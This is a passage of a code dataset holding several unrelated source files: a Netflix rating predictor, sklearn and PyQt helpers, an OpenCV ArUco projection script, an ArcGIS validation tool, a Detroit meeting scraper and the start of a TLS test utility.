4:\n\t\tmovie_offset = 0.1\n\telif round(movie_average) == 5:\n\t\tmovie_offset = 0.4\n\n\t# customer offset conditionals\n\n\tif round(customer_average) == 1:\n\t\tcustomer_offset = -0.4\n\telif round(customer_average) == 2:\n\t\tcustomer_offset = -0.1\n\telif round(customer_average) == 3:\n\t\tcustomer_offset = 0\n\telif round(customer_average) == 4:\n\t\tcustomer_offset = 0.1\n\telif round(customer_average) == 5:\n\t\tcustomer_offset = 0.4\n\n\t# release date conditionals\n\n\trelease_date = date_cache[eval(movie)]['year']\n\t\n\n\tif release_date == 'Unknown':\n\t\tdate_offset = 0\n\n\telif int(release_date) < 1950:\n\t\tdate_offset = 0.10\n\n\telif 1950 <= int(release_date) < 1975:\n\t\tdate_offset = 0.1\n\n\telif 1975 <= int(release_date) < 2000:\n\t\tdate_offset = 0\n\n\telif int(release_date) >= 2000:\n\t\tdate_offset = -0.1\n\t\n\t# -----\n\t# prediction\n\t# ----------\t\n\n\tprediction = (customer_average + movie_average)/2 + customer_offset + movie_offset + date_offset\n\n\n\tprediction_list.append(prediction)\n\tactual_list.append(probe_answers[int(movie)][int(cust)])\n\t\n\n\treturn prediction\n\n\n\n\ndef netflix_print_movie(w,movie):\n\tw.write(movie + \":\" + \"\\n\")\n\ndef netflix_print_prediction(w, pred):\n\tw.write('%0.3s \\n' %(pred))\n\ndef netflix_print_rmse(w, rmse):\n\tassert prediction_list\n\tassert actual_list\n\tw.write('RMSE: %0.4s' %(rmse))\n\n\n\n\ndef netflix_solve(r,w):\n\t\"\"\"\n\tr a reader\n\tw a writer\n\t\"\"\"\n\n\tcurrent_movie = '1'\n\tcurrent_customer = '30878'\n\twhile True:\n\t\ta = netflix_read(r)\n\n\t\tif not a:\n\t\t\tnetflix_print_rmse(w,str(rmse(prediction_list, actual_list)))\n\t\t\treturn\n\t\telif a[len(a)-1]==\":\":\n\t\t\tcurrent_movie = a[:len(a)-1]\n\t\t\tnetflix_print_movie(w,current_movie)\n\t\telse:\n\t\t\tcurrent_customer = a\n\t\t\tprediction = predict(current_customer,current_movie)\n\t\t\tnetflix_print_prediction(w, str(prediction))\t\n\n\n\t\n\n\n\n","sub_path":"Netflix.py","file_name":"Netflix.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"200776069","text":"from sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\n\n#kNN diff neighbors and diff weight\ndef kNeighbours(n_neighbors, weight, feature_train, label_train, feature_test):\n classifier = KNeighborsClassifier(n_neighbors, weight)\n classifier.fit(feature_train, label_train)\n label_prediction = classifier.predict(feature_test)\n proba = classifier.predict_proba(feature_test)\n return label_prediction, proba\n\n#Naive bayes\ndef naiveBayes(feature_train, label_train, feature_test):\n classifier = GaussianNB()\n #gnb.fit(X_train, y_train).predict(X_test)\n classifier.fit(feature_train, label_train)\n predicted = classifier.predict(feature_test)\n proba = classifier.predict_proba(feature_test)\n return predicted, proba\n\n\n\ndef getPredictionData(type, X_train, X_test, Y_train, Y_test, N_NEIGHBORS):\n if (type == \"NaiveBayes\"):\n label_prediction, proba = naiveBayes(X_train,Y_train, X_test)\n elif (type == \"kNeighbours\"):\n label_prediction, proba = kNeighbours(N_NEIGHBORS,'uniform', X_train, Y_train, X_test)\n\n return label_prediction, proba","sub_path":"exercise-classification/src/classification_alg.py","file_name":"classification_alg.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"520224104","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport platform\nimport sys\nimport string\nimport time\nimport datetime\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\ndef w(obj, dic = {}):\n a = type(obj)\n if a == QLineEdit:\n return str(obj.text())\n elif a == QCheckBox:\n return obj.isChecked()\n elif a == QPlainTextEdit:\n return str(obj.toPlainText())\n elif a == QComboBox:\n return dic[obj.currentText()]\n\ndef r(obj,var,field):\n a = type(obj)\n if a == QCheckBox:\n obj.setChecked(var[field])\n elif a == QLineEdit:\n obj.setText(var[field])\n elif a == QPlainTextEdit:\n obj.appendPlainText(var[field])\n elif a == QComboBox:\n obj.setEditText(var[field])\n\n\nif __name__ == '__main__':\n pass","sub_path":"libqt.py","file_name":"libqt.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"625404166","text":"#!/usr/bin/env python\n\n\"\"\"\n\n\tWorld to image points.\n\n\tWorld coordinate to image coordinate. Move from any 3D world coordinate to \n\ta pixel on the given image. \n\n\t1.) Detect location of aruco marker corners on 2D image.\n\n\t\t\tdetect all corners mij for 0 < i < 4 and 0 < j < 4.\n\n\n\t\t\t\t\t\t\tm00 m01 \tm10 m11\n\t\t\t\t\t\t\tm03 m02 \tm13 m12\n\n\t\t\t\t\t\t\t\t(chessboard)\n\n\t\t\t\t\t\t\tm30 m31 \tm20 m21\n\t\t\t\t\t\t\tm33 m32 \tm23 m22\n\n\n\t\t\twhere,\n\n\t\t\t\tmij ~ 2d pixel coordinate [x,y] of corner index \"j\" of aruco marker with id \"i\". \n\n\t\t\t\t* Coordinates of corners use standard image axis - \"(0,0) is at the top left of the image\"\n\n\t\tThis is done in the file \"aruco_marker_detection.py\" by the method: \n\n\t\t\t??? ### detect_aruco_marker_corners(image, aruco_dict)\n\n\t\tWhich returns a matrix, A, of 2D coordinates of aruco marker corners on the image.\n\n\n\t\t\n\t\t\t\t\t\t\t\t\tA = \n\n\t\t\t\t\t[ [[m00_x, m00_y], ..., [m03_x, m03_y]],\n\t\t\t\t\t\t... , \n\t\t\t\t\t[[m30_x, m30_y], ..., [m33_x, m33_y]] ]\n\n\n\t\t\t\t (Aruco Marker Corner 2D Image Locations Matrix)\n\n\t\t\twhere,\n\n\t\t\t\tA ~ Matrix of 2D image coordinates of aruco marker corners\n\t\t\t\tmij_x ~ x coordinate of aruco marker \"i\"'s \"j\"th corner.\n\t\t\t\tmij_y ~ y coordinate of aruco marker \"i\"'s \"j\"th corner.\n\n\t\t\t\n\t\t\t\t* (4x4x2) ~ (marker_id, corner_id, 2D_image_coordinate)\n\t\t\t\t* Coordinates of corners use standard image axis - \"(0,0) is at the top left of the image\"\n\t\t\n\t2.) Solve for Rotation matrix and translation vector \n\t\tto move between camera coordinates and world coordinates.\n\n\t\t\tUsing \n\t\t\t\t- known world coordinates of the aruco markers (object points from real world measurements) \n\t\t\t\t- detected corners on a 2D image (A)\n\t\t\t\t- instrinsic camera parameters file from \"camera_calibration.py\" (mtx, dist)\n\n\t\t\tsolve for the rotation matrix, R, and the translation vector, t,\n\t\t\tusing opencv's cv2.solvePnPRansac function. \n\n\t3.) Move from any 3D wolrd coordinate to 2D image coordinate.\n\n\t\t\tNow the 2D coordinate of any point on the image can be found if the 3D world coordinate\n\t\t\tis know by using R, t, mtx, dist to go from world coordinates to camera coordinates, then by \n\t\t\tprojecting the 3D camera coordinates point to the image plane using opencv's cv2.projectPoints.\n\n\t\t\twhere,\n\n\t\t\t\tmtx ~ camera matrix.\n\t\t\t\tdist ~ distortion coefficients.\n\t\t\t\tR ~ rotation matrix \n\t\t\t\tt ~ translation vector\n\n\n\n\"\"\"\n\n__author__ = \"l.j. Brown\"\n__version__ = \"1.0.4\"\n\n#\n#\n#\t\t\t\t\t\t\t\t\timports\t\n#\n#\n\n# internal\nimport os\nimport logging\nimport random\n\n# external\nimport glob\nimport numpy as np\nimport cv2\nimport cv2.aruco as aruco\nfrom scipy import stats\n\n# my lib\nimport aruco_marker_detection as marker_detector\n\n#\n#\n#\t\t\t\t\t\t\t\t\tSettings\n#\n#\n\nARUCO_MARKER_SETTINGS_FNAME = \"aruco_markers/aruc_markers_settings.json\" \t\t# Do not change\n\ninput_ftemplate = \"test_aruco_images_input/%s\"\noutput_ftemplate = \"test_aruco_images_output/%s\"\n\n#\n# \tAruco marker 3D model points. \"world points\" of corners\n#\n\nmh,mw = 3.0,3.0 \t# inches\nmH,mW = 31.5, 31.25 # inches \n\naruco_model_points = np.array([\n\t\t\t\t\t\t\t# \tx, \ty, \tz= 0.0\n\n\t\t\t\t\t\t\t(\t0.0, \t0.0, \t0.0\t\t), # m00\n\t\t\t\t\t\t\t(\tmw, \t0.0, \t0.0\t\t),\t\t\t # m01\n\t\t\t\t\t\t\t(\tmw, \tmh, \t0.0\t\t), # m02\n\t\t\t\t\t\t\t(\t0.0, \tmh,\t\t0.0\t\t),\t\t\t # m03\n\n\t\t\t\t\t\t\t(\tmW-mw, \t0.0, \t0.0\t\t), \t # m10\n\t\t\t\t\t\t\t(\tmW, \t0.0, \t0.0\t\t),\t\t\t # m11\n\t\t\t\t\t\t\t(\tmW, \tmh, \t0.0\t\t), # m12\n\t\t\t\t\t\t\t(\tmW-mw, \tmh, \t0.0\t\t),\t\t\t # m13\n\n\t\t\t\t\t\t\t(\tmW-mw, \tmH-mh, \t0.0\t\t), \t\t # m20\n\t\t\t\t\t\t\t(\tmW, \tmH-mh, \t0.0\t\t),\t\t\t # m21\n\t\t\t\t\t\t\t(\tmW, \tmH, \t0.0\t\t), # m22\n\t\t\t\t\t\t\t(\tmW-mw, \tmH, \t0.0\t\t)\t\t\t # m23\n\n\t\t\t\t\t\t])\n\n# Board measurements\nbh, bw = 7.75, 7.75 \t# inches\ntlx, tly = 11.50, 11.50 # inches\nheight = -0.75 \t\t\t# inches\nchessboard_model_points = np.array([\n\n\t\t\t\t\t\t\t# \tx, \ty, \tz= -0.75\n\n\t\t\t\t\t\t\t(\ttlx, \ttly, \theight\t\t), # b0 - top left\n\t\t\t\t\t\t\t(\ttlx+bw, tly, \theight\t\t),\t\t\t # b1 - top right\n\t\t\t\t\t\t\t(\ttlx+bw, tly+bh, height\t\t), # b2 - bottom right\n\t\t\t\t\t\t\t(\ttlx, \ttly+bh,\theight\t\t)\t\t\t # b3 - bottom left\n\t\t\t\t\t\t])\n\n\n# Base measurments\nbh, bw = 11.75, 10.75 \t# inches\ntlx, tly = 10.15, 11.0\t# inches\nchesboard_lower_border_model_corner_points = np.array([\n\n\t\t\t\t\t\t\t# \tx, \ty, \tz= 0.0\n\n\t\t\t\t\t\t\t(\ttlx, \ttly, \t0.0\t\t), # b0 - top left\n\t\t\t\t\t\t\t(\ttlx+bw, tly, \t0.0\t\t),\t\t\t # b1 - top right\n\t\t\t\t\t\t\t(\ttlx+bw, tly+bh, 0.0\t\t), # b2 - bottom right\n\t\t\t\t\t\t\t(\ttlx, \ttly+bh,\t0.0\t\t)\t\t\t # b3 - bottom left\n\t\t\t\t\t\t])\n\n\n#\n#\n#\t\t\t\t\t\t\t\t\tLogging\n#\n#\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n#\n#\n#\t\t\t\t\t\t\t\t\tMethods\n#\n#\n\n#\n# Load input images\n#\n\ndef load_images_from_template(image_file_template):\n\n\t# dictonary : { base_fname : {'cv2 image' : image, 'full path' : fpath}, ...}\n\tfname_image_dict = {}\n\n\timages = glob.glob(image_file_template % '*')\n\tfor fpath in images:\n\t\tbase_fname = os.path.split(fpath)[1]\n\t\timage = cv2.imread(fpath)\n\t\tfname_image_dict[base_fname] = {'cv2 image' : image, 'full path' : fpath}\n\n\treturn fname_image_dict\n\n#\n# Write output images\n#\n\ndef write_image_dict(output_image_dict, output_image_file_template):\n\n\tfor base_fname,v in output_image_dict.items():\n\t\tfpath = output_image_file_template % base_fname\n\t\timage = v['cv2 image']\n\t\tcv2.imwrite(fpath, image)\n\n#\n# Estimate Camera Matrix\n#\n\ndef estimate_camera_matrix(image, focal_length=None):\n\tsize = input_image.shape\n\n\t# Camera internals (estimated)\n\t\n\tif focal_length is None:\n\t\tfocal_length = size[1]\n\n\tcenter = (size[1]/2, size[0]/2)\n\tcamera_matrix = np.array(\n\t\t\t\t\t\t\t [[focal_length, 0, center[0]],\n\t\t\t\t\t\t\t [0, focal_length, center[1]],\n\t\t\t\t\t\t\t [0, 0, 1]], dtype = \"double\"\n\t\t\t\t\t\t\t )\n\n\treturn camera_matrix\n\n#\n# Estimate Distortion Coefficients\n#\n\ndef estimate_distortion_coefficients():\n\tdist_coeffs = np.zeros((4,1)) # Assuming no lens distortion\n\treturn dist_coeffs\n\n#\n# Solve for rotation matrix and translation vector\n#\n\ndef solve_PNPransac(model_points, image_points, camera_matrix, dist_coeffs):\t# use aruco_image_points and aruc_model_points\n\t_, rotation_matrix, translation_vector, _ = cv2.solvePnPRansac(model_points, image_points, camera_matrix, dist_coeffs)\n\treturn rotation_matrix, translation_vector\n\n\n#\n#\tSolve PNP \n#\n\ndef solve_PNP(model_points, image_points, camera_matrix, dist_coeffs):\t# use aruco_image_points and aruc_model_points\n\t_, rotation_matrix, translation_vector = cv2.solvePnP(model_points, image_points, camera_matrix, dist_coeffs) #, flags = cv2.CV_EPNP)\n\t\n\treturn rotation_matrix, translation_vector\n\n#\n# Project world points to 2D image points. World points is an nx3 matrix for n points (x,y,z).\n#\n\ndef world_to_image_point(world_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs):\n\n\timage_points, _ = cv2.projectPoints(world_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t# clean up corners\n\tcleaned_image_points = np.array(list([ip[0].tolist() for ip in image_points]))\n\timage_points = cleaned_image_points.reshape(-1,2)\n\n\treturn image_points\n\n\n#\n#\n#\tDrawing Methods\n#\n#\n\n#\n#\tDraw nx2 point matrix onto image and return image\n#\n\ndef draw_point_matrix(image_points, image, color=None, thickness=15):\n\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tfor i in range(image_points.shape[0]):\n\t\tcenter = np_2_tupple_int(image_points[i])\n\t\tradius = 1\n\t\tif color is None:\n\t\t\tcolor = (0,0,255)\n\t\tcv2.circle(image, center, radius, color, thickness, lineType=8, shift=0)\n\n\treturn image\n\ndef draw_triangle(T, input_image, color=None, lineThickness = 4):\n\t# T - 3x2 matrix following clockwise convention\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tif color is None:\n\t\tcolor = (0,255,0)\n\n\tfor i in range(3):\n\t\tstart_coor = T[i,:]\n\t\tif i == 2:\n\t\t\tend_coor = T[0,:]\n\t\telse:\n\t\t\tend_coor = T[i+1,:]\n\n\t\t# draw line on image\n\t\tcv2.line(input_image, np_2_tupple_int(start_coor), np_2_tupple_int(end_coor), color, lineThickness)\n\n\treturn input_image\n\ndef draw_box(B, input_image, color=None, lineThickness = 4):\n\t# B - 4x2 matrix following clockwise convention\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tif color is None:\n\t\tcolor = (0,255,0)\n\n\tfor i in range(4):\n\t\tstart_coor = B[i,:]\n\t\tif i == 3:\n\t\t\tend_coor = B[0,:]\n\t\telse:\n\t\t\tend_coor = B[i+1,:]\n\n\t\t# draw line on image\n\t\tcv2.line(input_image, np_2_tupple_int(start_coor), np_2_tupple_int(end_coor), color, lineThickness)\n\n\treturn input_image\n\ndef draw_box_diagnols(B, input_image, color=None, lineThickness=4):\n\t# B - 4x2 matrix following clockwise convention\n\tnp_2_tupple_int = lambda t: tuple(int(e) for e in tuple(t))\n\n\tif color is None:\n\t\tcolor = (0,255,0)\n\n\t# draw positive diagnol\n\tcv2.line(input_image, np_2_tupple_int(B[3]), np_2_tupple_int(B[1]), color, lineThickness)\n\n\t# draw negitive diagnol\n\tcv2.line(input_image, np_2_tupple_int(B[0]), np_2_tupple_int(B[2]), color, lineThickness)\n\n\treturn input_image\n\n\n# regression [slope, intercept] of best fit line from points\ndef regression_line_poly_coeffs(xs,ys):\n\n\t# perform linear regression\n\tslope, intercept, r_value, p_value, std_err = stats.linregress(xs,ys)\n\n\t# polynomial coefficents for best fit line\n\tp = [slope, intercept]\n\t\n\treturn p\n\n\ndef interpolate_additional_points(aruco_image_points, line_point_indices, input_image):\n\n\t\tline_image_points = aruco_image_points[line_point_indices] # get image points that should lay on the line\n\n\t\t#\tseperate x and y columns\n\t\tx = line_image_points[:,0]\n\t\ty = line_image_points[:,1]\n\n\t\t# perform linear regression and retreive polynomial coefficents for best fit line\n\t\tp = regression_line_poly_coeffs(x,y)\n\n\t\t# lambda function for y value given x -- rounded to an integer\n\t\tline_y_hat = lambda x: int(np.polyval(p,x))\n\t\tstart_coor = (int(x[0]), line_y_hat(x[0]))\n\t\tend_coor = (int(x[-1]), line_y_hat(x[-1]))\n\n\t\t# draw line on image\n\t\t#lineThickness = 4\n\t\t#cv2.line(input_image, start_coor, end_coor, (255,0,0), lineThickness)\n\n\t\treturn input_image\n\ndef point_of_intersection(coeffs_line_1, coeffs_line_2):\n\n\t\t\"\"\"\n\n\t\t\tline intersection\n\n\t\t\tax+c=bx+d.\n\n\t\t\trearrange to extract value of x\n\t\t\tax-bx=d-c\n\n\t\t\tx=(d-c)/(a-b)\n\t\t\ty=a(d-c)/(a-b) +c.\n\n\t\t\tpoint of interscetion is\n\n\t\t\t\t<(d-c)/(a-b) , (ad - bc)/(a-b)>\n\n\t\t\"\"\"\n\n\t\ta, c = coeffs_line_1\n\t\tb, d = coeffs_line_2\n\n\t\tpoint = [int((d-c)/(a-b)), int((a*d - b*c)/(a-b))]\n\n\t\treturn point\n\n\n#\n#\n#\t\t\t\t\t\t\t\tProgram\n#\n#\n\nif __name__ == '__main__':\n\t\n\n\tinput_image_dict = load_images_from_template(input_ftemplate) # originals\n\toutput_image_dict = input_image_dict.copy() \n\n\n\tfor k,v in input_image_dict.items():\n\n\t\t#\n\t\t# \tload image\n\t\t#\n\n\t\tinput_image = v['cv2 image']\n\n\n\n\t\t#\n\t\t#\tperform basic detection on aruco corners, solve pnpransac, project points\n\t\t#\n\n\t\t# detect image points\n\t\taruco_image_points = marker_detector.detect_aruco_image_points(input_image)\n\n\t\tcamera_matrix = estimate_camera_matrix(input_image)\n\t\tdist_coeffs = estimate_distortion_coefficients()\n\t\trotation_matrix, translation_vector = solve_PNPransac(aruco_model_points, aruco_image_points, camera_matrix, dist_coeffs)\n\n\t\t# NEW solvePNP\n\t\trotation_matrix, translation_vector = solve_PNP(aruco_model_points, aruco_image_points, camera_matrix, dist_coeffs)\n\n\t\t# project 3d world points of chessboard corners to image points\n\t\tchessboard_corner_points = world_to_image_point(chessboard_model_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t\t# project correct 3d world points of aruco markers to image points\n\t\tcheck_aruco_image_points = world_to_image_point(aruco_model_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t\t# project 3d world points of chessboard base frame to image points\n\t\tchessboard_base_model_image_points = world_to_image_point(chesboard_lower_border_model_corner_points, rotation_matrix, translation_vector, camera_matrix, dist_coeffs)\n\n\t\t#\n\t\t# draw all points\n\t\t#\n\n\t\t# draw detected aruco trianlge ingonoring pnpsolver\n\t\t# indices 0,5,10\n\t\t#input_image = draw_triangle(aruco_image_points[[0,5,10]], input_image, color=(255,0,0))\n\n\n\t\t# draw projected aruco trianlge using pnpsolver\n\t\t# indices 0,5,10\n\t\t#input_image = draw_triangle(check_aruco_image_points[[0,5,10]], input_image, color=(0,0,255), lineThickness=10)\n\n\t\t# draw detected aruco box ingonoring pnpsolver\n\t\t#indices 0,5,10,15\n\t\t#input_image = draw_box(aruco_image_points[[0,5,10,15]], input_image, color=(255,0,0))\n\t\t#input_image = draw_box_diagnols(aruco_image_points[[0,5,10,15]], input_image, color=(255,0,0))\n\n\t\t# draw projected aruco box using pnpsolver\n\t\t#indices 0,5,10,15\n\t\t#input_image = draw_box(check_aruco_image_points[[0,5,10,15]], input_image, color=(0,0,255))\n\t\t#input_image = draw_box_diagnols(check_aruco_image_points[[0,5,10,15]], input_image, color=(0,0,255), lineThickness=10)\n\n\t\t# draw error points/ predicted points\n\t\t#input_image = draw_point_matrix(check_aruco_image_points, input_image)\t# \"error\"\n\n\t\t# draw detected aruco points\n\t\t#input_image = draw_point_matrix(aruco_image_points, input_image, color=(255,0,0))\n\n\t\t# draw predicted chessboard corner points\n\t\t#input_image = draw_point_matrix(chessboard_corner_points, input_image, color=(0,255,0))\n\n\n\t\t# draw chessboard frame\n\t\tinput_image = draw_box(chessboard_corner_points, input_image, color=(0,255,0), lineThickness=2)\n\t\t#input_image = draw_box_diagnols(chessboard_corner_points, input_image, color=(0,255,0))\n\n\t\t# draw base of chessboard frame\n\t\tinput_image = draw_box(chessboard_base_model_image_points, input_image, color=(0,255,0))\n\t\t#input_image = draw_box_diagnols(chessboard_base_model_image_points, input_image, color=(0,255,0), lineThickness=20)\n\n\n\n\t\t#\n\t\t# \tset output image in dictonary\n\t\t#\n\n\t\toutput_image_dict[k]['cv2 image'] = input_image\n\n\n\t# write output image dictonary\n\twrite_image_dict(output_image_dict, output_ftemplate)\n\n","sub_path":"chessboard_corner_detection/world_to_image_points.py","file_name":"world_to_image_points.py","file_ext":"py","file_size_in_byte":13608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"59168645","text":"import arcpy\nimport os\nimport json\n\narcpy.env.overwriteOutput = True\n\njsonfile = open(r'\\\\srvfile01\\bdgeocientifica$\\Addins_Geoprocesos\\PotencialMinero\\scripts\\config_tools.json', 'r')\nconfigTmp = json.load(jsonfile)\nconfig = configTmp[\"depositosMinerales\"]\njsonfile.close()\ndel jsonfile\n\n\nclass depoMin:\n\tdef __init__(self):\n\t\tself.ws = arcpy.GetParameterAsText(0)\n\t\tself.fc = arcpy.GetParameterAsText(1)\n\t\tself.grade = arcpy.GetParameterAsText(2)\n\t\tself.value = arcpy.GetParameterAsText(3)\n\t\tself.domains = config[\"domains\"]\n\t\tself.msg = config[\"msg\"]\n\t\tself.error = config[\"error\"]\n\t\tself.information = []\n\n\n\tdef consistency_01_Grado(self):\n\t\tarcpy.AddMessage(\"\\n {}: {}...\".format(self.msg[\"m1\"], self.grade))\n\t\terrores = [[1, x[0], x[1].lower()] for x in arcpy.da.SearchCursor(self.fc, [\"OID@\", self.grade]) if x[1].lower() not in self.domains[\"grade\"]]\n\t\tif len(errores) != 0:\n\t\t\tself.information.extend(errores)\n\t\telse:\n\t\t\tpass\n\n\n\tdef consistency_02_Value(self):\n\t\tarcpy.AddMessage(\" {}: {}...\".format(self.msg[\"m2\"], self.value))\n\t\terrores = [[2, x[0], x[1]] for x in arcpy.da.SearchCursor(self.fc, [\"OID@\", self.value]) if x[1] < self.domains[\"value\"][\"min\"] and x[1] > self.domains[\"value\"][\"max\"]]\n\t\tif len(errores) != 0:\n\t\t\tself.information.extend(errores)\n\t\telse:\n\t\t\tpass\n\n\n\tdef process(self):\n\t\tarcpy.AddMessage(\"\\n {}: {}... \".format(self.msg[\"m3\"], os.path.basename(self.ws)))\n\t\ttry:\n\t\t\tdesc = arcpy.Describe(self.ws)\n\t\t\tif desc.datatype == u'Workspace':\n\t\t\t\tif arcpy.Exists(os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales')):\n\t\t\t\t\tif len(self.information) > 0:\n\t\t\t\t\t\tarcpy.AddMessage(\" Errores:\")\n\t\t\t\t\t\tfor x in self.information:\n\t\t\t\t\t\t\te = self.error[\"e{}\".format(x[0])]\n\t\t\t\t\t\t\tarcpy.AddWarning(\" {}: FID: {}, Valor: {}\".format(e, x[1], x[2]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tarcpy.AddMessage(\" {}...\".format(self.msg[\"m4\"]))\n\t\t\t\t\t\tcopia = arcpy.CopyFeatures_management(self.fc, \"in_memory\\\\depositosMinerales\")\n\t\t\t\t\t\twith arcpy.da.UpdateCursor(copia, [self.grade]) as cursorUC:\n\t\t\t\t\t\t\tfor row in cursorUC:\n\t\t\t\t\t\t\t\trow[0] = row[0].lower()\n\t\t\t\t\t\t\t\tcursorUC.updateRow(row)\n\t\t\t\t\t\tdel cursorUC\n\t\t\t\t\t\tcampos = {\"GRADO\": self.grade, \"VALOR\": self.value}\n\t\t\t\t\t\tarcpy.DeleteRows_management(os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales'))\n\t\t\t\t\t\tfor k, v in campos.items():\n\t\t\t\t\t\t\tarcpy.AlterField_management(copia, v, k)\n\t\t\t\t\t\tarcpy.Append_management(copia, os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales'), \"NO_TEST\")\n\t\t\t\t\t\tarcpy.SetParameterAsText(4, os.path.join(self.ws, 'FD1_INSUMOS', 'PM_V4_DepositosMinerales'))\n\t\t\t\t\t\tarcpy.AddMessage(\"\\n {}... \\n\".format(self.msg[\"m5\"]))\n\t\t\t\t\t\tarcpy.AddMessage(\" {} \\n\".format(self.msg[\"m6\"]))\n\t\t\t\telse:\n\t\t\t\t\traise RuntimeError(\"\\n {}... \\n\".format(self.error[\"e3\"]))\n\t\t\telse:\n\t\t\t\traise RuntimeError(\"\\n {}... \\n\".format(self.error[\"e4\"]))\n\t\texcept Exception as e:\n\t\t\tarcpy.AddWarning(e)\n\n\n\n\tdef main(self):\n\t\tself.consistency_01_Grado()\n\t\tself.consistency_02_Value()\n\t\tself.process()\n\n\nif __name__ == \"__main__\":\n\tobj = depoMin()\n\tobj.main()","sub_path":"tbx/desarrollo/V4_depositosMinerales.py","file_name":"V4_depositosMinerales.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"125157922","text":"# -*- coding: utf-8 -*-\nimport re\nfrom collections import defaultdict\nfrom datetime import datetime, time\nfrom urllib.parse import urljoin\n\nfrom dateutil.parser import parse\n\nfrom city_scrapers.constants import COMMISSION\nfrom city_scrapers.spider import Spider\n\n\nclass DetCityPlanningSpider(Spider):\n name = 'det_city_planning'\n agency_name = 'Detroit City Planning Commission'\n timezone = 'America/Detroit'\n allowed_domains = ['www.detroitmi.gov']\n base_url = 'https://www.detroitmi.gov/'\n start_urls = ['https://www.detroitmi.gov/Government/Boards/City-Planning-Commission-Meetings']\n location = {\n 'name': 'Committee of the Whole Room, 13th floor, Coleman A. Young Municipal Center',\n 'address': '2 Woodward Avenue, Detroit, MI 48226',\n 'neighborhood': '',\n }\n\n def parse(self, response):\n \"\"\"\n `parse` should always `yield` a dict that follows the Event Schema\n .\n\n Change the `_parse_id`, `_parse_name`, etc methods to fit your scraping\n needs.\n \"\"\"\n meetings = self._parse_meetings(response)\n for meeting_date_time, document_url in meetings.items():\n data = {\n '_type': 'event',\n 'name': 'City Planning Commission',\n 'event_description': '',\n 'classification': COMMISSION,\n 'start': {\n 'date': meeting_date_time.date(),\n 'time': time(17, 00),\n 'note': 'Meeting runs from 5:00 pm to approximately 8:00 pm'\n },\n 'end': {\n 'date': meeting_date_time.date(),\n 'time': time(20, 00),\n 'note': ''\n },\n 'all_day': False,\n 'location': self.location,\n 'documents': self._create_documents(response.url, document_url),\n 'sources': [{\n 'url': response.url,\n 'note': ''\n }]\n }\n\n data['status'] = self._generate_status(data)\n data['id'] = self._generate_id(data)\n\n yield data\n\n def _parse_meetings(self, response):\n meetings = self._parse_has_agenda_meetings(response)\n no_agenda_meetings = self._parse_no_agenda_meetings(response)\n for meeting_date in no_agenda_meetings:\n if meeting_date not in meetings:\n meetings[meeting_date] = no_agenda_meetings[meeting_date]\n return meetings\n\n @staticmethod\n def _parse_no_agenda_meetings(response):\n year_str = datetime.now().year\n meetings = defaultdict(str)\n meetings_text = response.xpath('//tr/td/text()').extract()\n month_day_regex = re.compile(r\"\\w+\\s\\d+\")\n for meeting in meetings_text:\n # Check if cell is actual text\n if meeting[0].isalpha():\n month_day = month_day_regex.search(meeting).group(0)\n meeting_date = parse(month_day + ' ' + str(year_str))\n meetings[meeting_date] = ''\n return meetings\n\n @staticmethod\n def _parse_has_agenda_meetings(response):\n meetings = defaultdict(str)\n date_regex = re.compile(r\"\\w+\\s\\d+,\\s\\d{4}\")\n meeting_agendas = response.xpath('//div[@id=\"dnn_ctr9526_HtmlModule_lblContent\"]//li')\n for agenda in meeting_agendas:\n agenda_link = agenda.xpath('./a/@href').extract_first()\n meeting_date_text = agenda.xpath('./a/text()').extract_first()\n date_text = date_regex.search(meeting_date_text).group(0)\n meeting_date = parse(date_text)\n meetings[meeting_date] = agenda_link\n return meetings\n\n def _create_documents(self, base_url, url):\n \"\"\"\n Parse or generate documents.\n \"\"\"\n if url:\n return [{'url': urljoin(base_url, url), 'note': 'Agenda'}]\n return []\n","sub_path":"city_scrapers/spiders/det_city_planning.py","file_name":"det_city_planning.py","file_ext":"py","file_size_in_byte":4017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"559801366","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nUtilities\n\"\"\"\n\nimport os\nimport os.path\nimport ssl\nfrom params import Protocols, KeyExAlgos, CipherSuites\nfrom certs import Certs, CertGroup\n\n\ndef get_cert_group(key_ex_algo):\n \"\"\" Assemble CertGroup based on the specified key exchange algorithm \"\"\"\n\n if key_ex_algo in (\n KeyExAlgos.RSA,\n KeyExAlgos.DHE_RSA,\n KeyExAlgos.ECDHE_RSA):\n return CertGroup(Certs.CA_RSA, Certs.SERVER_RSA, Certs.CLIENT_RSA)\n else:\n return CertGroup(\n Certs.CA_ECDSA,\n Certs.SERVER_ECDSA,\n Certs.CLIENT_ECDSA)\n\n\ndef tls_version(protocol):\n \"\"\" Convert Protocol to TLS protocol option \"\"\"\n\n if protocol == Protocols.TLSV1_0:\n return 